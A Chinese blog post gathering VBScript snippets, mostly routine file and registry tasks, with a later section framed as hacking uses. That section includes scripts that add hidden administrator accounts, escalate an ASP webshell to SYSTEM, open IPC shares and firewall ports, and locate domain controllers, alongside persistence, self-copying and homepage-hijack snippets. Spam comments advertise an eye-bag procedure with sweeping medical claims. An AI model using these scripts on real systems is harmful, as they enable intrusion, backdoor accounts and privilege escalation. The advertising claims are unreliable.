Feb 1

VBS脚本常用经典代码收集 不指定

闻达 , 13:51 , 电脑技巧 , 评论(51) , 引用(0) , 阅读(20599) , Via 本站原创 | |

最近在玩系统封装,顺便学了下VBS,发现VBS功能还是比较强大的(做流氓软件啊 啥的-0-),以下是我在互联网上收集到的经典代码,供大家参考!

1. 计算

2. 处理文件和文件夹

3. 管理Windows

4. 处理Word, Excel, PowerPoint等Office文档

5. 嵌入网页,驱动dHTML

6. 编写HTTP通信

7. 调用系统功能(COM组件),比如说语音说话

8. 分析HTML, XML

9. 调用命令行并分析返回结果

10. 处理图片

11. 自动化按键

12. 调用Windows Media Player并管理

13. 调用Windows Live Messenger并管理

14. 服务端技术:Active Server Page (ASP)

15. 脚本病毒

16. 处理数据库



VBS获取系统安装路径

先定义这个变量是获取系统安装路径的,然后我们用”&strWinDir&”调用这个变量。

set WshShell = WScript.CreateObject("WScript.Shell")

strWinDir = WshShell.ExpandEnvironmentStrings("%WinDir%")VBS获取C:Program Files路径msgbox CreateObject("WScript.Shell").ExpandEnvironmentStrings("%ProgramFiles%")



VBS获取C:Program FilesCommon Files路径



msgbox CreateObject("WScript.Shell").ExpandEnvironmentStrings("%CommonProgramFiles%")



给桌面添加网址快捷方式



set gangzi = WScript.CreateObject("WScript.Shell")

strDesktop = gangzi.SpecialFolders("Desktop")

set oShellLink = gangzi.CreateShortcut(strDesktop & "Internet Explorer.lnk")

oShellLink.TargetPath = "http://www.fendou.info"

oShellLink.Description = "Internet Explorer"

oShellLink.IconLocation = "%ProgramFiles%Internet Exploreriexplore.exe, 0"

oShellLink.Save



给收藏夹添加网址



Const ADMINISTRATIVE_TOOLS = 6

Set objShell = CreateObject("Shell.Application")

Set objFolder = objShell.Namespace(ADMINISTRATIVE_TOOLS)

Set objFolderItem = objFolder.Self

Set objShell = WScript.CreateObject("WScript.Shell")

strDesktopFld = objFolderItem.Path

Set objURLShortcut = objShell.CreateShortcut(strDesktopFld & "奋斗Blog.url")

objURLShortcut.TargetPath = "http://www.fendou.info/"

objURLShortcut.Save



删除指定目录指定后缀文件



On Error Resume Next

Set fso = CreateObject("Scripting.FileSystemObject")

fso.DeleteFile "C:*.vbs", True

Set fso = Nothing



VBS改主页



Set oShell = CreateObject("WScript.Shell")

oShell.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainStart Page","http://www.fendou.info"



VBS加启动项



Set oShell=CreateObject("Wscript.Shell")

oShell.RegWrite "HKLMSoftwareMicrosoftWindowsCurrentVersionRuncmd","cmd.exe"



VBS复制自己



set copy1=createobject("scripting.filesystemobject")

copy1.getfile(wscript.scriptfullname).copy("c:huan.vbs")



复制自己到C盘的huan.vbs(复制本vbs目录下的game.exe文件到c盘的gangzi.exe)



set copy1=createobject("scripting.filesystemobject")

copy1.getfile("game.exe").copy("c:gangzi.exe")



VBS获取系统临时目录



Dim fso

Set fso = CreateObject("Scripting.FileSystemObject")

Dim tempfolder

Const TemporaryFolder = 2

Set tempfolder = fso.GetSpecialFolder(TemporaryFolder)

Wscript.Echo tempfolder



就算代码出错 依然继续执行



On Error Resume Next



VBS打开网址



Set objShell = CreateObject("Wscript.Shell")

objShell.Run("http://www.fendou.info/")



VBS发送邮件



NameSpace = "http://schemas.microsoft.com/cdo/configuration/"

Set Email = CreateObject("CDO.Message")

Email.From = "发件@qq.com"

Email.To = "收件@qq.com"

Email.Subject = "Test sendmail.vbs"

Email.Textbody = "OK!"

Email.AddAttachment "C:1.txt"

With Email.Configuration.Fields

.Item(NameSpace&"sendusing") = 2

.Item(NameSpace&"smtpserver") = "smtp.邮件服务器.com"

.Item(NameSpace&"smtpserverport") = 25

.Item(NameSpace&"smtpauthenticate") = 1

.Item(NameSpace&"sendusername") = "发件人用户名"

.Item(NameSpace&"sendpassword") = "发件人密码"

.Update

End With

Email.Send



VBS结束进程



strComputer = "."

Set objWMIService = GetObject _

("winmgmts:\" & strComputer & "rootcimv2")

Set colProcessList = objWMIService.ExecQuery _

("Select * from Win32_Process Where Name = 'Rar.exe'")

For Each objProcess in colProcessList

objProcess.Terminate()

Next



VBS隐藏打开网址(部分浏览器无法隐藏打开,而是直接打开,适合主流用户使用)



createObject("wscript.shell").run "iexplore http://www.fendou.info/",0



兼容所有浏览器,使用IE的绝对路径+参数打开,无法用函数得到IE安装路径,只用函数得到了Program Files路径,应该比上面的方法好,但是两种方法都不是绝对的。



Set objws=WScript.CreateObject("wscript.shell")

objws.Run """C:Program FilesInternet Exploreriexplore.exe""www.baidu.com",vbhide



VBS遍历硬盘删除指定文件名



On Error Resume Next

Dim fPath

strComputer = "."

Set objWMIService = GetObject _

("winmgmts:\" & strComputer & "rootcimv2")

Set colProcessList = objWMIService.ExecQuery _

("Select * from Win32_Process Where Name = 'gangzi.exe'")

For Each objProcess in colProcessList

objProcess.Terminate()

Next

Set objWMIService = GetObject("winmgmts:" _

& "{impersonationLevel=impersonate}!\" & strComputer & "rootcimv2")

Set colDirs = objWMIService. _

ExecQuery("Select * from Win32_Directory where name LIKE '%c:%' or name LIKE '%d:%' or name LIKE '%e:%' or name LIKE '%f:%' or name LIKE '%g:%' or name LIKE '%h:%' or name LIKE '%i:%'")

Set objFSO = CreateObject("Scripting.FileSystemObject")

For Each objDir in colDirs

fPath = objDir.Name & "gangzi.exe"

objFSO.DeleteFile(fPath), True

Next



VBS获取网卡MAC地址



Dim mc,mo

Set mc=GetObject("Winmgmts:").InstancesOf("Win32_NetworkAdapterConfiguration")

For Each mo In mc

If mo.IPEnabled=True Then

MsgBox "本机网卡MAC地址是: " & mo.MacAddress

Exit For

End If

Next



VBS获取本机注册表主页地址



Set reg=WScript.CreateObject("WScript.Shell")

startpage=reg.RegRead("HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainStart Page")

MsgBox startpage



VBS遍历所有磁盘的所有目录,找到所有.txt的文件,然后给所有txt文件最底部加一句话



On Error Resume Next

Set fso = CreateObject("Scripting.FileSystemObject")

Co = VbCrLf & "路过。。。"

For Each i In fso.Drives

If i.DriveType = 2 Then

GF fso.GetFolder(i & "")

End If

Next

Sub GF(fol)

Wh fol

Dim i

For Each i In fol.SubFolders

GF i

Next

End Sub

Sub Wh(fol)

Dim i

For Each i In fol.Files

If LCase(fso.GetExtensionName(i)) = "shtml" Then

fso.OpenTextFile(i,8,0).Write Co

End If

Next

End Sub



获取计算机所有盘符



Set fso=CreateObject("scripting.filesystemobject")

Set objdrives=fso.Drives '取得当前计算机的所有磁盘驱动器

For Each objdrive In objdrives '遍历磁盘

MsgBox objdrive

Next



VBS给本机所有磁盘根目录创建文件



On Error Resume Next

Set fso=CreateObject("Scripting.FileSystemObject")

Set gangzis=fso.Drives '取得当前计算机的所有磁盘驱动器

For Each gangzi In gangzis '遍历磁盘

Set TestFile=fso.CreateTextFile(""&gangzi&"新建文件夹.vbs",Ture)

TestFile.WriteLine("By www.gangzi.org")

TestFile.Close

Next



VBS遍历本机全盘找到所有123.exe,然后给他们改名321.exe



set fs = CreateObject("Scripting.FileSystemObject")

for each drive in fs.drives

fstraversal drive.rootfolder

next

sub fstraversal(byval this)

for each folder in this.subfolders

fstraversal folder

next

set files = this.files

for each file in files

if file.name = "123.exe" then file.name = "321.exe"

next

end sub



VBS写入代码到粘贴板(先说明一下,VBS写内容到粘贴板,网上千篇一律都是通过InternetExplorer.Application对象来实现,但是缺点是在默认浏览器为非IE中会弹出浏览器,所以费了很大的劲找到了这个代码来实现)



str=“这里是你要复制到剪贴板的字符串”

Set ws = wscript.createobject("wscript.shell")

ws.run "mshta vbscript:clipboardData.SetData("+""""+"text"+""""+","+""""&str&""""+")(close)",0,true



QQ自动发消息



On Error Resume Next

str="我是笨蛋/qq"

Set WshShell=WScript.CreateObject("WScript.Shell")

WshShell.run "mshta vbscript:clipboardData.SetData("+""""+"text"+""""+","+""""&str&""""+")(close)",0

WshShell.run "tencent://message/?Menu=yes&uin=20016964&Site=&Service=200&sigT=2a39fb276d15586e1114e71f7af38e195148b0369a16a40fdad564ce185f72e8de86db22c67ec3c1",0,true

WScript.Sleep 3000

WshShell.SendKeys "^v"

WshShell.SendKeys "%s"



VBS隐藏文件



Set objFSO = CreateObject("Scripting.FileSystemObject")

Set objFile = objFSO.GetFile("F:软件大赛show.txt")

If objFile.Attributes = objFile.Attributes AND 2 Then

objFile.Attributes = objFile.Attributes XOR 2

End If



VBS生成随机数(521是生成规则,不同的数字生成的规则不一样,可以用于其它用途)



Randomize 521

point=Array(Int(100*Rnd+1),Int(1000*Rnd+1),Int(10000*Rnd+1))

msgbox join(point,"")



VBS删除桌面IE图标(非快捷方式)



Set oShell = CreateObject("WScript.Shell")

oShell.RegWrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoInternetIcon",1,"REG_DWORD"



VBS获取自身文件名



Set fso = CreateObject("Scripting.FileSystemObject")

msgbox WScript.ScriptName



VBS读取Unicode编码的文件



Set objFSO = CreateObject("Scripting.FileSystemObject")

Set objFile = objFSO.OpenTextFile("gangzi.txt",1,False,-1)

strText = objFile.ReadAll

objFile.Close

Wscript.Echo strText



VBS读取指定编码的文件(默认为uft-8)gangzi变量是要读取文件的路径



set stm2 =createobject("ADODB.Stream")

stm2.Charset = "utf-8"

stm2.Open

stm2.LoadFromFile gangzi

readfile = stm2.ReadText

MsgBox readfile



VBS禁用组策略



Set oShell = CreateObject("WScript.Shell")

oShell.RegWrite "HKEY_CURRENT_USERSoftwarePoliciesMicrosoftMMCRestrictToPermittedSnapins",1,"REG_DWORD"



VBS写指定编码的文件(默认为uft-8)gangzi变量是要读取文件的路径,gangzi2是内容变量



gangzi="1.txt"

gangzi2="www.gangzi.org"

Set Stm1 = CreateObject("ADODB.Stream")

Stm1.Type = 2

Stm1.Open

Stm1.Charset = "UTF-8"

Stm1.Position = Stm1.Size

Stm1.WriteText gangzi2

Stm1.SaveToFile gangzi,2

Stm1.Close

set Stm1 = nothing



VBS获取当前目录下所有文件夹名字(不包括子文件夹)



Set fso=CreateObject("scripting.filesystemobject")

Set f=fso.GetFolder(fso.GetAbsolutePathName("."))

Set folders=f.SubFolders

For Each fo In folders

wsh.echo fo.Name

Next

Set folders=Nothing

Set f=nothing

Set fso=nothing



VBS获取指定目录下所有文件夹名字(包括子文件夹)



Dim t

Set fso=WScript.CreateObject("scripting.filesystemobject")

Set fs=fso.GetFolder("d:")

WScript.Echo aa(fs)

Function aa(n)

Set f=n.subfolders

For Each uu In f

Set op=fso.GetFolder(uu.path)

t=t & vbcrlf & op.path

Call aa(op)

Next

aa=t

End function



VBS创建.URL文件(IconIndex参数不同的数字代表不同的图标,具体请参照SHELL32.dll里面的所有图标)



set fso=createobject("scripting.filesystemobject")

qidong=qidong&"[InternetShortcut]"&Chr(13)&Chr(10)

qidong=qidong&"URL=http://www.fendou.info"&Chr(13)&Chr(10)

qidong=qidong&"IconFile=C:WINDOWSsystem32SHELL32.dll"&Chr(13)&Chr(10)

qidong=qidong&"IconIndex=130"&Chr(13)&Chr(10)

Set TestFile=fso.CreateTextFile("qq.url",Ture)

TestFile.WriteLine(qidong)

TestFile.Close



VBS写hosts(没写判断,无论存不存在都追加底部)



Set fs = CreateObject("Scripting.FileSystemObject")

path = ""&fs.GetSpecialFolder(1)&"driversetchosts"

Set f = fs.OpenTextFile(path,8,TristateFalse)

f.Write ""&vbcrlf&"127.0.0.1 www.g.cn"&vbcrlf&"127.0.0.1 g.cn"

f.Close



VBS读取出HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerDesktopNameSpace 下面所有键的名字并循环输出



Const HKLM = &H80000002

strPath = "SOFTWAREMicrosoftWindowsCurrentVersionExplorerDesktopNameSpace"

Set oreg = GetObject("Winmgmts:rootdefault:StdRegProv")

oreg.EnumKey HKLM,strPath,arr

For Each x In arr

WScript.Echo x

Next



VBS创建txt文件



Dim fso,TestFile

Set fso=CreateObject("Scripting.FileSystemObject")

Set TestFile=fso.CreateTextFile("C:hello.txt",Ture)

TestFile.WriteLine("Hello,World!")

TestFile.Close



VBS创建文件夹



Dim fso,fld

Set fso=CreateObject("Scripting.FileSystemObject")

Set fld=fso.CreateFolder("C:newFolder")



VBS判断文件夹是否存在



Dim fso,fld

Set fso=CreateObject("Scripting.FileSystemObject")

If (fso.FolderExists("C:newFolder")) Then

msgbox("Folder exists.")

else

set fld=fso.CreateFolder("C:newFolder")

End If



VBS使用变量判断文件夹



Dim fso,fld

drvName="C:"

fldName="newFolder"

Set fso=CreateObject("Scripting.FileSystemObject")

If (fso.FolderExists(drvName&fldName)) Then

msgbox("Folder exists.")

else

set fld=fso.CreateFolder(drvName&fldName)

End If



VBS加输入框



Dim fso,TestFile,fileName,drvName,fldName

drvName=inputbox("Enter the drive to save to:","Drive letter")

fldName=inputbox("Enter the folder name:","Folder name")

fileName=inputbox("Enter the name of the file:","Filename")

Set fso=CreateObject("Scripting.FileSystemObject")

If(fso.FolderExists(drvName&fldName))Then

msgbox("Folder exists")

Else

Set fld=fso.CreateFolder(drvName&fldName)

End If

Set TestFile=fso.CreateTextFile(drvName&fldName&""&fileName&".txt",True)

TestFile.WriteLine("Hello,World!")

TestFile.Close



VBS检查是否有相同文件



Dim fso,TestFile,fileName,drvName,fldName

drvName=inputbox("Enter the drive to save to:","Drive letter")

fldName=inputbox("Enter the folder name:","Folder name")

fileName=inputbox("Enter the name of the file:","Filename")

Set fso=CreateObject("Scripting.FileSystemObject")

If(fso.FolderExists(drvName&fldName))Then

msgbox("Folder exists")

Else

Set fld=fso.CreateFolder(drvName&fldName)

End If

If(fso.FileExists(drvName&fldName&""&fileName&".txt"))Then

msgbox("File already exists.")

Else

Set TestFile=fso.CreateTextFile(drvName&fldName&""&fileName&".txt",True)

TestFile.WriteLine("Hello,World!")

TestFile.Close

End If



VBS改写、追加 文件



Dim fso,openFile

Set fso=CreateObject("Scripting.FileSystemObject")

Set openFile=fso.OpenTextFile("C:test.txt",2,True) '1表示只读,2表示可写,8表示追加

openFile.Write "Hello World!"

openFile.Close



VBS读取文件 ReadAll 读取全部



Dim fso,openFile

Set fso=CreateObject("Scripting.FileSystemObject")

Set openFile=fso.OpenTextFile("C:test.txt",1,True)

MsgBox(openFile.ReadAll)



VBS读取文件 ReadLine 读取一行



Dim fso,openFile

Set fso=CreateObject("Scripting.FileSystemObject")

Set openFile=fso.OpenTextFile("C:test.txt",1,True)

MsgBox(openFile.ReadLine())

MsgBox(openFile.ReadLine()) '如果读取行数超过文件的行数,就会出错



VBS读取文件 Read 读取n个字符



Dim fso,openFile

Set fso=CreateObject("Scripting.FileSystemObject")

Set openFile=fso.OpenTextFile("C:test.txt",1,True)

MsgBox(openFile.Read(2)) '如果超出了字符数,不会出错。



VBS删除文件



Dim fso

Set fso=CreateObject("Scripting.FileSystemObject")

fso.DeleteFile("C:test.txt")



VBS删除文件夹



Dim fso

Set fso=CreateObject("Scripting.FileSystemObject")

fso.DeleteFolder("C:newFolder") '不管文件夹中有没有文件都一并删除



VBS连续创建文件



Dim fso,TestFile

Set fso=CreateObject("Scripting.FileSystemObject")

For i=1 To 10

Set TestFile=fso.CreateTextFile("C:hello"&i&".txt",Ture)

TestFile.WriteLine("Hello,World!")

TestFile.Close

Next



VBS根据计算机名随机生成字符串



set ws=createobject("wscript.shell")

set wenv=ws.environment("process")

RDA=wenv("computername")

Function UCharRand(n)

For i=1 to n

Randomize ASC(MID(RDA,1,1))

temp = cint(25*Rnd)

temp = temp +65

UCharRand = UCharRand & chr(temp)

Next

End Function

msgbox UCharRand(LEN(RDA))



VBS根据mac生成序列号



Function Encode(strPass)

Dim i, theStr, strTmp

For i = 1 To Len(strPass)

strTmp = Asc(Mid(strPass, i, 1))

theStr = theStr & Abs(strTmp)

Next

strPass = theStr

theStr = ""

Do While Len(strPass) > 16

strPass = JoinCutStr(strPass)

Loop

For i = 1 To Len(strPass)

strTmp = CInt(Mid(strPass, i, 1))

strTmp = IIf(strTmp > 6, Chr(strTmp + 60), strTmp)

theStr = theStr & strTmp

Next

Encode = theStr

End Function

Function JoinCutStr(str)

Dim i, theStr

For i = 1 To Len(str)

If Len(str) – i = 0 Then Exit For

theStr = theStr & Chr(CInt((Asc(Mid(str, i, 1)) + Asc(Mid(str, i +1, 1))) / 2))

i = i + 1

Next

JoinCutStr = theStr

End Function

Function IIf(var, val1, val2)

If var = True Then

IIf = val1

Else

IIf = val2

End If

End Function

Set mc=GetObject("Winmgmts:").InstancesOf("Win32_NetworkAdapterConfiguration")

For Each mo In mc

If mo.IPEnabled=True Then

theStr = mo.MacAddress

Exit For

End If

Next

Randomize Encode(theStr)

rdnum=Int(10*Rnd+5)

Function allRand(n)

For i=1 to n

Randomize Encode(theStr)

temp = cint(25*Rnd)

If temp mod 2 = 0 then

temp = temp + 97

ElseIf temp < 9 then

temp = temp + 48

Else

temp = temp + 65

End If

allRand = allRand & chr(temp)

Next

End Function

msgbox allRand(rdnum)



VBS自动连接adslDim Wsh

Set Wsh = WScript.CreateObject("WScript.Shell")

wsh.run "Rasdial 连接名字 账号 密码",false,1



VBS自动断开ADSL



Dim Wsh

Set Wsh = WScript.CreateObject("WScript.Shell")

wsh.run "Rasdial /DISCONNECT",false,1



VBS每隔3秒自动更换IP并打开网址实例(值得一提的是,下面这个代码中每次打开的网址都是引用同一个IE窗口,也就是每次打开的是覆盖上次打开的窗口,如果需要每次打开的网址都是新窗口,直接使用run就可以了)



Dim Wsh

Set Wsh = WScript.CreateObject("WScript.Shell")

Set oIE = CreateObject("InternetExplorer.Application")

for i=1 to 5

wsh.run "Rasdial /DISCONNECT",false,1

wsh.run "Rasdial 连接名字 账号 密码",false,1

oIE.Navigate "http://www.ip138.com/?"&i&""

Call SynchronizeIE

oIE.Visible = True

next

Sub SynchronizeIE

On Error Resume Next

Do While(oIE.Busy)

WScript.Sleep 3000

Loop

End Sub



用VBS来加管理员帐号在注入过程中明明有了sa帐号,但是由于net.exe和net1.exe被限制,或其它的不明原因,总是加不了管理员帐号。VBS在活动目录(adsi)部份有一个winnt对像,可以用来管理本地资源,可以用它不依靠cmd等命令来加一个管理员,详细代码如下:



set wsnetwork=CreateObject("WSCRIPT.NETWORK")

os="WinNT://"&wsnetwork.ComputerName

Set ob=GetObject(os) '得到adsi接口,绑定

Set oe=GetObject(os&"/Administrators,group") '属性,admin组

Set od=ob.Create("user","lcx") '建立用户

od.SetPassword "123456" '设置密码

od.SetInfo '保存

Set of=GetObject(os&"/lcx",user) '得到用户

oe.add os&"/lcx"



这段代码如果保存为1.vbs,在cmd下运行,格式: cscript 1.vbs的话,会在当前系统加一个名字为lcx,密码为123456的管理员。当然,你可以用记事本来修改里边的变量lcx和123456,改成你喜欢的名字和密码值。

用vbs来列虚拟主机的物理目录有时旁注入侵成功一个站,拿到系统权限后,面对上百个虚拟主机,怎样才能更快的找到我们目标站的物理目录呢?一个站一个站翻看太累,用系统自带的adsutil.vbs吧又感觉好像参数很多,有点无法下手的感觉,试试我这个脚本吧,代码如下:



Set ObjService=GetObject("IIS://LocalHost/W3SVC")

For Each obj3w In objservice

If IsNumeric(obj3w.Name) Then

sServerName=Obj3w.ServerComment

Set webSite = GetObject("IIS://Localhost/W3SVC/" & obj3w.Name & "/Root")

ListAllWeb = ListAllWeb & obj3w.Name & String(25-Len(obj3w.Name)," ") & obj3w.ServerComment & "(" & webSite.Path & ")" & vbCrLf

End If

Next

WScript.Echo ListAllWeb

Set ObjService=Nothing

WScript.Quit



运行cscript 2.vbs后,就会详细列出IIS里的站点ID、描述、及物理目录,是不是代码少很多又方便呢?

用VBS快速找到内网域的主服务器面对域结构的内网,可能许多小菜没有经验如何去渗透。如果你能拿到主域管理员的密码,整个内网你就可以自由穿行了。主域管理员一般呆在比较重要的机器上,如果能搞定其中的一台或几台,放个密码记录器之类,相信总有一天你会拿到密码。主域服务器当然是其中最重要一台了,如何在成千台机器里判断出是哪一台呢?dos命令像net group “domain admins” /domain可以做为一个判断的标准,不过vbs也可以做到的,这仍然属于adsi部份的内容,代码如下:

 



set obj=GetObject("LDAP://rootDSE")

wscript.echo obj.servername

 



只用这两句代码就足够了,运行cscript 3.vbs,会有结果的。当然,无论是dos命令或vbs,你前提必须要在域用户的权限下。好比你得到了一个域用户的帐号密码,你可以用 psexec.exe -u -p cmd.exe这样的格式来得到域用户的shell,或你的木马本来就是与桌面交互的,登陆你木马shell的又是域用户,就可以直接运行这些命令了。vbs的在入侵中的作用当然不只这些,当然用js或其它工具也可以实现我上述代码的功能;不过这个专栏定下的题目是vbs在hacking中的妙用,所以我们只提vbs。写完vbs这部份我和其它作者会在以后的专栏继续策划其它的题目,争取为读者带来好的有用的文章。



WebShell提权用的VBS代码asp木马一直是搞脚本的朋友喜欢使用的工具之一,但由于它的权限一般都比较低(一般是IWAM_NAME权限),所以大家想出了各种方法来提升它的权限,比如说通过asp木马得到mssql数据库的权限,或拿到ftp的密码信息,又或者说是替换一个服务程序。而我今天要介绍的技巧是利用一个vbs文件来提升asp木马的权限,代码如下asp木马一直是搞脚本的朋友喜欢使用的工具之一,但由于它的权限一般都比较低(一般是IWAM_NAME权限),所以大家想出了各种方法来提升它的权限,比如说通过asp木马得到mssql数据库的权限,或拿到ftp的密码信息,又或者说是替换一个服务程序。而我今天要介绍的技巧是利用一个vbs文件来提升asp木马的权限,代码如下:



set wsh=createobject("wscript.shell") '创建一个wsh对象

a=wsh.run ("cmd.exe /c cscript.exe C:InetpubAdminScriptsadsutil.vbs set /W3SVC/InProcessIsapiApps C:WINNTsystem32inetsrvhttpext.dll C:WINNTsystem32inetsrvhttpodbc.dll C:WINNTsystem32inetsrvssinc.dll C:WINNTsystem32msw3prt.dll C:winntsystem32inetsrvasp.dll",0) '加入asp.dll到InProcessIsapiApps中

 



将其保存为vbs的后缀,再上传到服务上,然后利用asp木马执行这个vbs文件后。再试试你的asp木马吧,你会发现自己己经是system权限了

VBS开启ipc服务和相关设置



Dim OperationRegistry

Set OperationRegistry=WScript.CreateObject("WScript.Shell")

OperationRegistry.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsaforceguest",0

Set wsh3=wscript.createobject("wscript.shell")

wsh3.Run "net user helpassistant 123456",0,false

wsh3.Run "net user helpassistant /active",0,false

wsh3.Run "net localgroup administrators helpassistant /add",0,false

wsh3.Run "net start Lanmanworkstation /y",0,false

wsh3.Run "net start Lanmanserver /y",0,false

wsh3.Run "net start ipc$",0,True

wsh3.Run "net share c$=c:",0,false

wsh3.Run "netsh firewall set notifications disable",0,True

wsh3.Run "netsh firewall set portopening TCP 139 enable",0,false

wsh3.Run "netsh firewall set portopening UDP 139 enable",0,false

wsh3.Run "netsh firewall set portopening TCP 445 enable",0,false

wsh3.Run "netsh firewall set portopening UDP 445 enable",0,false

 



VBS时间判断代码

 



Digital=time

hours=Hour(Digital)

minutes=Minute(Digital)

seconds=Second(Digital)

if (hours<6) then

dn="凌辰了,还没睡啊?"

end if

if (hours>=6) then

dn="早上好!"

end if

if (hours>12) then

dn="下午好!"

end if

if (hours>18) then

dn="晚上好!"

end if

if (hours>22) then

dn="不早了,夜深了,该睡觉了!"

end if

if (minutes<=9) then

minutes="0" & minutes

end if

if (seconds<=9) then

seconds="0" & seconds

end if

ctime=hours & ":" & minutes & ":" & seconds & " " & dn

Msgbox ctime

 



VBS注册表读写



Dim OperationRegistry , mynum

Set OperationRegistry=WScript.CreateObject("WScript.Shell")

mynum = 9

mynum = OperationRegistry.RegRead("HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsaforceguest")

MsgBox("before forceguest = "&mynum)

OperationRegistry.RegWrite "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsaforceguest",0

mynum = OperationRegistry.RegRead("HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsaforceguest")

MsgBox("after forceguest = "&mynum)

 



VBS运行后删除自身代码

dim fso,f

Set fso = CreateObject("Scripting.FileSystemObject")

f = fso.DeleteFile(WScript.ScriptName)

WScript.Echo( WScript.ScriptName)

Tags: ,

-----------闻达誓死捍卫你的评论权-------------

2012/02/23 17:24 mkg43dry75l Email Homepage
超声波去眼袋涨价之后,效果更好了
我对超声波去眼袋的了解源于我的朋友,她做超声波去眼袋的时间比较久,而且我是见证人之一,所以对超声波去眼袋的初期状态比较了解。
第一次接触超声波去眼袋是1997年,朋友不知道在哪里看到重庆有超声波去眼袋,做过之后不会复发所以就想做。可是,一个女生来重庆终究是有些胆怯,所以就叫上了我和另外一个朋友,我们一起到的重庆。印象最深的是当时做完眼袋手术要敷24小时的眼膜,敷上眼膜什么都干不了,睡觉之余就只有聊天消遣。幸好,眼膜取掉之后效果还不错,也没有枉费我们专程到重庆一趟。
其实陪着朋友去的时候我也有一点长眼膜的趋势,但因为不明显,也不知道超声波去眼袋是不是真的不复发,所以就没有跟着一起做。可是,这两年越来越离不开电脑,睡得越来越晚,我的眼袋也越来越大,而当年做过超声波去眼袋那个朋友,经常泡夜店,眼袋却真的没有再长。
朋友劝我跟她一样,去做眼袋手术一劳永逸,我想想也是这个道理,而她做过的超声波去眼袋知根知底,所以我也决定去重庆。联系电话早就被朋友弄丢了,好在网络很发达,我就上网去搜,我这才发现人家的地址因为修步行街也变了,如果我没有查一下就去重庆,绝对有可能扑空,(原来的房子已经拆迁,变成了花园)。而且价格也变了,以前朋友做的时候是两千多,而现在要四千八,不过考虑到这两年的物价,价格翻一倍的比比皆是,也就释然。
为了防止敷眼膜的24小时无聊,我也拖上一个朋友一起去重庆,可是当我到了重庆才知道,重庆的城市面貌变化好大,基本上完全认不出原来的样子了,超雅也从405车站搬到繁华步行街中心(1997年观音桥没有步行街,如今已经是全国十大知名步行街之一),而超雅原来当年的技术早就改进了,现在做完眼袋手术之后只需要敷四个小时眼膜。除了眼膜,还有一点重大改进就是,以前朋友做超声波去眼袋的时候是有针眼的,具体做的过程我不知道,但是刚做完的时候可以看到针眼,虽然后来痊愈了就看不到了。但是现在发明超声波去眼袋的梁医生说,超声波去眼袋仪器已经经过几代变迁,还申请了国家专利,是完全无创的。虽然价格高了,但是服务质量却上去了,这无疑是给我的一个意外惊喜,如果朋友知道现在的超声波去眼袋,不知道会不会后悔那么早就做眼袋手术呢?
在做完超声波去眼袋之后,四个小时的敷眼膜时间很快就过去了,刚取眼膜的效果也比几年前好很多,陪我来的朋友也觉得很好。本来我以为要敷24小时眼膜,所以跟朋友定的回程票是两天以后的,梁医生说我可以好好逛一下重庆,只需要注意不要太劳累就可以了,不会影响效果。而我跟朋友真的把重庆的红色旅游景点逛了一圈,逛完之后对重庆的了解又加深了一层。
我觉得这次去重庆真是收获颇多,超声波去眼袋的一代代更新,让我看到了内地的科技一天天发展。我希望有越来越多像超声波去眼袋一样的专利产品出现,那么我们的生活一定可以更美好。
2012/02/23 17:20 mkg43dry75l Email Homepage
超声波去眼袋与开刀祛眼袋比较有那些优势?
优势1:不开刀,就意味着损伤小。
优势2、不疼痛,而且是绝无疼痛,做的过程类似按摩,开刀祛眼袋100%疼痛。
优势3、不打麻药,由于超声波去眼袋不疼痛,就不需要打麻药,开刀祛眼袋一定要打麻药。
优势4、不复发,而且随便熬夜,随便失眠,随便加班,随便喝水都不复发。开刀祛眼袋2-3年就会复发,无论怎么保养。
优势5、不会睑外翻,开刀祛眼袋有可能发生睑外翻。
优势6、没有疤痕,开刀祛眼袋遇到疤痕体质就会留疤痕。
优势7、淤青可能性小,大约只有10-20%,开刀祛眼袋100%淤青出血。
优势8、恢复快,开刀祛眼袋伤口恢复慢。
优势9、第二天可以上班,对于轻微工作,如办公室工作第二天可以上班,开刀法祛眼袋要休息至少5-7天。
优势10、不拆线。开刀祛眼袋7天必须拆线.
优势11、不损伤眼轮匝肌,开刀祛眼袋一定要损伤,导致笑时不自然。
优势12、遗传性眼袋也保证终身,开刀祛眼袋对遗传性眼袋没有多少办法。
优势13、终身不用眼霜防眼袋复发。开刀法祛眼袋必须用眼霜保养,否则复发更快。
优势14、肿胀轻微,超声波去眼袋肿胀程度介于有眼袋与无眼袋之间,与有眼袋比较叫不肿,与无眼袋比较叫肿。开刀法祛眼袋100%肿胀,而且有时肿得眼睛都无法睁开。
详情见超声波去眼袋官方网站cqcymr.cn
,或咨询13271893093
2012/02/23 16:59 wKaPdfght01 Email Homepage
超声波去眼袋是真的吗?(转载)
说到超声波去眼袋,我在去重庆之前真的不止一次怀疑其真实性,可是当我慢慢的拔开超声波去眼袋那层神秘的面纱之后,觉得这并不是一件神秘的事情。今天,我要告诉大家的是,要相信科学,不要以为不开刀去眼袋是神迹,这只是科学的进步。
刚刚得知超声波去眼袋时,我第一反应就是不开刀是骗人的,因为我不止一次的看过这种把戏,抽脂去眼袋也可以说成不开刀,因为确实没有动手术刀嘛,像这种文字游戏我见得太多了。不过,抱着好奇的念头,我也通过网络咨询了一下,回馈回来的信息确实是不开刀,而且不是文字游戏,咨询的人明确跟我表态,做了超声波去眼袋是不会有任何伤口的。
得到了咨询的保证,我开始好奇于超声波去眼袋凭什么可以做到不开刀就把眼袋脂肪取出来,所以在百度上查了个清楚。超声波的原理应该与物理有关,虽然我从小物理成绩就不好,但是在我把超声波去眼袋的原理读上两遍之后,渐渐也对超声波去眼袋有了一定了解,开始相信超声波去眼袋真的可以不开刀就去掉眼袋。原来,超声波去眼袋是利用了超声波共振的原理,找到眼袋脂肪的共振频率,使超声波去眼袋仪发出与眼袋脂肪相同的频率,引起共振,从而破坏眼袋脂肪,使其液化之后可以轻易导出。导出这个程序只需要敷上特制的眼膜就可以了,据说是因为眼底的渗透性强,液化的脂肪可以流出部分,所以也不需要担心会开洞导出脂肪。
